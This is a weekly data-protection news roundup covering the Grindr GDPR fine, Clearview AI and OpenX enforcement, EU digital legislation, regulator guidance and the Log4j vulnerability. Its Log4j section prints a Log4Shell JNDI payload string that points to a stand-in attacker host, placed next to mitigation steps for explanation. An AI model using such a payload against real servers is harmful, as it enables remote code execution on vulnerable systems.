TechGDPR’s review of international data-related stories from press and analytical reports.
Grindr’s privacy fine in focus
Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, a privacy fine of over 6 mln euros for disclosing user data to third parties for behavioural advertising without a legal basis. The offences were committed before April 2020, when its terms of use and consent management platform (CMP) were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender, and the fact of their app use. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the app and advertising vendors. At the same time, Grindr failed to comply with most of the requirements for freely given, specific, informed and unambiguous consent, and its withdrawal, for such data sharing:
- users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
- the consents for sharing data with advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically whether they wanted their data shared with third parties for advertising);
- the information about the sharing was not properly communicated to users;
- refusing consent depended on the user’s patience and technological understanding, and the process did not offer a fair, intuitive and genuinely free choice.
Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy could upgrade to the paid version. However, the regulator pointed out that at the time of registration users were not given the choice to opt for the paid version of the app. The user first had to go through the consent mechanism described above; only after this process could the user decide to upgrade to the paid version.
Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR (data protection by design and by default). Participants in the ad tech ecosystem would likely only receive a “blinded” app ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.”
The Norwegian regulator, however, stated that even if the app ID was “blinded” in some instances, the recipient could still receive keywords relating to the Grindr app. For example, OpenX, which Grindr considers its processor, appended the keywords “gay”, “bi” and “bi-curious” to ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and would also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read the 70-page fine notice in the Grindr case (available in English), which explains more facts and the relevant GDPR provisions.
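To see why keywords defeat app-ID “blinding”, consider a hypothetical, OpenRTB-style fragment of an ad request (all values are invented and this is not an actual Grindr or OpenX request; `bundle` and `keywords` are standard fields of the OpenRTB `app` object):

```
{
  "app": {
    "bundle": "com.example.blinded-app-123",
    "keywords": "gay,bi,bi-curious"
  },
  "device": {
    "ip": "198.51.100.7",
    "geo": { "lat": 59.91, "lon": 10.75 }
  }
}
```

Even with the app name withheld, the keywords – combined with a precise location and IP address – let any recipient in the bidding chain infer what kind of app the request came from, which is exactly the regulator’s point.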
Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data
In Finland, a psychotherapy centre was issued a privacy fine over a failure to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020, after finding a blackmail message: the patient database had been uploaded to the attacker’s servers, and a ransom was demanded to recover the lost data. A sample of the patient database was attached to the threat letter. It later became clear that the hacking had probably already taken place in 2018, and that another hack occurred in 2019, due to the poor protection of the patient information system. The data protection impact assessment carried out by the company also did not meet the requirements of Art. 35(7) of the GDPR. Finally, the company did not have a documented notification procedure in place at the time of the security breaches.
French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly available images worldwide, to stop its illegal use of biometric data from people in France and to delete it within two months. The UK Information Commissioner’s Office, which worked with the Australian regulator on the Clearview investigation, also said last month that it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.
California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC.
Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act
The EDPB published its contribution to the EU Commission’s evaluation of the Law Enforcement Directive (LED). The LED is a piece of EU legislation, parallel to the GDPR, which also came into effect in 2018; it aims to support cooperation between police authorities through the exchange of personal data. Previously, EU legal instruments in this area were limited to data protection rules for EU agencies, large-scale IT systems established under EU law, or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. However, new legislative and technological developments in the processing of data for law enforcement purposes have increased the workload of EDPB members. Data protection authorities may also often have to balance their resources between supervision of the GDPR and of the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.
The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviours. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing, and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional requirements on:
- the use of data for targeted or micro-targeted advertising and the interoperability of services (e.g. number-independent interpersonal communication services and social network services);
- the option for users to uninstall pre-installed software applications on a core platform service at any stage.
The approved text will be Parliament’s mandate for negotiations with EU governments, planned to start in the first half of 2022. The Digital Services Act (DSA) – a parallel proposal to regulate online platforms, dealing with, among other issues, profiling algorithms and deceptive or nudging techniques that influence users’ behaviour through “dark patterns” – is due to be put to the vote in plenary in January. Read also the latest analysis by Baker McKenzie of the DSA’s possible effects on EU residents’ fundamental rights and freedoms.
Meanwhile, Australia and the US signed a Cloud Act deal to help law enforcement agencies demand data from tech giants, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain information. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian reports.
Official guidance: SMEs, developers, biometrics, cookies
The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online trackers, and to audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities that have led to data breaches notified to the CNIL, and presents examples of measures that would have made it possible to avoid them. In total, the guide now includes 18 thematic sheets covering most developers’ needs, supporting them at each stage of a project: from identifying and minimizing the personal data collected, to preparing for the exercise of data subjects’ rights, managing retention periods, and the technical implementation of legal bases.
The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organizations still do not allow users to refuse cookies as easily as to accept them, and the CNIL has decided to send 30 new formal notices. The recent checks found that:
- cookies subject to consent were automatically placed on the user’s terminal equipment before acceptance;
- information banners are still non-compliant because they do not allow the user to refuse cookies as easily as to accept them;
- some banners offer the user a means of refusing cookies with the same degree of simplicity as accepting them, but the mechanism is not effective because cookies subject to consent are still placed after the user has refused.
These new formal notices particularly affect public establishments, higher education institutions, the clothing industry, and the transport, mass distribution and distance-selling sectors.
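The behaviour the CNIL is demanding can be sketched in a few lines (the function and cookie names below are illustrative, not part of any real CMP API): cookies that require consent may only be set after an explicit acceptance, and a refusal must actually be honoured rather than merely displayed.

```typescript
// Hypothetical consent gate: returns the cookies a banner may set for a
// given user choice. Refusing is one action, exactly as simple as accepting.
function cookiesToSet(choice: "accept" | "refuse"): string[] {
  if (choice === "accept") {
    // Consent-requiring cookies (ads, analytics) only after acceptance.
    return [
      "consent=granted; max-age=15552000; path=/",
      "ad_id=a1b2c3; max-age=15552000; path=/",
    ];
  }
  // After a refusal, only the record of the refusal itself may be stored.
  // Placing tracking cookies here is exactly what the formal notices target.
  return ["consent=denied; max-age=15552000; path=/"];
}
```

The third finding above corresponds to a banner that calls something like `cookiesToSet("refuse")` but then sets tracking cookies anyway.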
In Germany, the Saxony-Anhalt data protection commissioner published a guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in various industries collect, store and use personal data from customers, employees and suppliers, often in a variety of ways – and must comply with data protection law. The State Commissioner has long received numerous inquiries from such companies, for example:
- What customer or employee data is a company allowed to collect?
- How long may the data be stored?
- What should be done when customers exercise their data protection rights, or when employee data has been encrypted in a cyberattack?
Answers to these and many other typical questions are provided by the State Commissioner in the newly published guide. Read the full text here.
The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data qualifies as a special category of personal data (Art. 9 GDPR), whose processing is generally prohibited unless a specific derogation applies – either the explicit consent of the data subject or necessity for reasons of substantial public interest. Since there is currently no norm in Belgian law that authorises the processing of biometric data for the authentication of individuals, and insofar as explicit consent cannot be invoked, such processing is currently performed without a legal basis. Other key takeaways are:
- it is important to consider whether the performance of a contract or the provision of a service is conditioned on consent being provided;
- consent is presumed not to be “freely given” in particular in employer-employee relationships and where a product or service has a (quasi-)monopoly in the market;
- the purpose limitation, data minimization and proportionality principles are particularly important for the processing of biometric data;
- data protection impact assessments will generally be required;
- no transition period for companies is provided.
Opinion: What if your boss was an algorithm?
Privacy International and its partners have teamed up to challenge the unprecedented surveillance that gig economy workers face from their employers. They filed over 500 data subject access requests (DSARs) with seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola, and Uber – and also interviewed gig workers. According to their report, several gig economy employers seem reluctant to fully comply with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate the score used to prioritise the dispatch of journeys to drivers. Some companies also failed to provide the guidance documents or location data that they gather. Finally, the report demonstrates that surveillance is not just vast data collection but also the use of more invasive technologies: it provides specific examples where facial recognition technology locked drivers out of their accounts due to potential identity verification failures.
Data security: Log4j follow up
The EU Commission, the EU Agency for Cybersecurity, CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the well-known open source Java logging package Log4j, maintained by the Apache Software Foundation and used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity, and the complexity of patching in some of the affected environments, it is important that all organisations – especially entities that fall under the Network and Information Security Directive – assess their potential exposure as soon as possible. The latest recommendations can be found in:
- the list of vulnerable software maintained by the Dutch National Cyber Security Center;
- advisory notices published by the CSIRTs Network members in their official communication channels;
- guidance given by CERT-EU.
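For context, the vulnerability (CVE-2021-44228) is triggered when attacker-controlled text reaches a Log4j logging call, because vulnerable 2.x versions resolve JNDI lookups embedded in log messages. A sketch of the attack surface and the mitigations Apache publicised at the time (version numbers reflect the advisories as of December 2021; the hostname is an invented example):

```
# A request header, username, or any other logged, attacker-supplied string
# like this triggers a remote JNDI lookup on vulnerable Log4j 2.x versions:
${jndi:ldap://attacker.example/exploit}

# Mitigations recommended by Apache at the time:
# 1) Upgrade log4j-core to a fixed release (2.17.0, or 2.12.3 on Java 7).
# 2) As a stop-gap on versions 2.10-2.14.1, disable message lookups:
-Dlog4j2.formatMsgNoLookups=true
# 3) Or remove the vulnerable lookup class from the jar entirely:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```

Because the malicious string can arrive through any logged field, upgrading (rather than filtering inputs) is the only reliable fix, which is why the advisories above stress assessing exposure across every dependency.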
Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphones duopoly
Microsoft is rolling out end-to-end encryption (E2EE) support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and testing a public preview since October, Teams is getting E2EE support for all one-to-one calls. Microsoft currently encrypts data in transit and at rest, allowing authorized services to decrypt content. Microsoft also uses SharePoint encryption to secure files at rest and OneNote encryption for notes stored in Microsoft Teams. All chat content in Teams is likewise encrypted in transit and at rest.
US telecom giant Verizon signed a deal with Alphabet’s Google Cloud to combine Verizon’s 5G network with the tech firm’s computing power to offer services such as autonomous robots and smart factories, says Reuters. Telecom companies have been partnering with technology firms to automate businesses and factories, lowering costs and speeding up data traffic through private 5G networks that do not jostle for speed with others on a public network. Verizon has also been making private 5G deals in several countries and has partnered with other cloud operators such as Microsoft’s Azure and Amazon’s AWS. Reportedly “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.
The US Consumer Financial Protection Bureau (CFPB) asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that these financial products put consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. As an example, a recent survey by personal finance company Credit Karma found that one-third of US consumers who used “buy-now, pay-later” services had fallen behind on one or more payments, and 72% of those said their credit scores declined.
Apple and Google have a “vice-like grip” over people’s mobile phones, and their duopoly over the market should be investigated by the proposed new regulator, says the UK’s competition authority, the CMA. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit (DMU), which will be part of the CMA, has been set up in shadow form until the government officially grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will affect only those companies deemed to have strategic market status, although no tech firms have officially been awarded that status yet, the Guardian reports.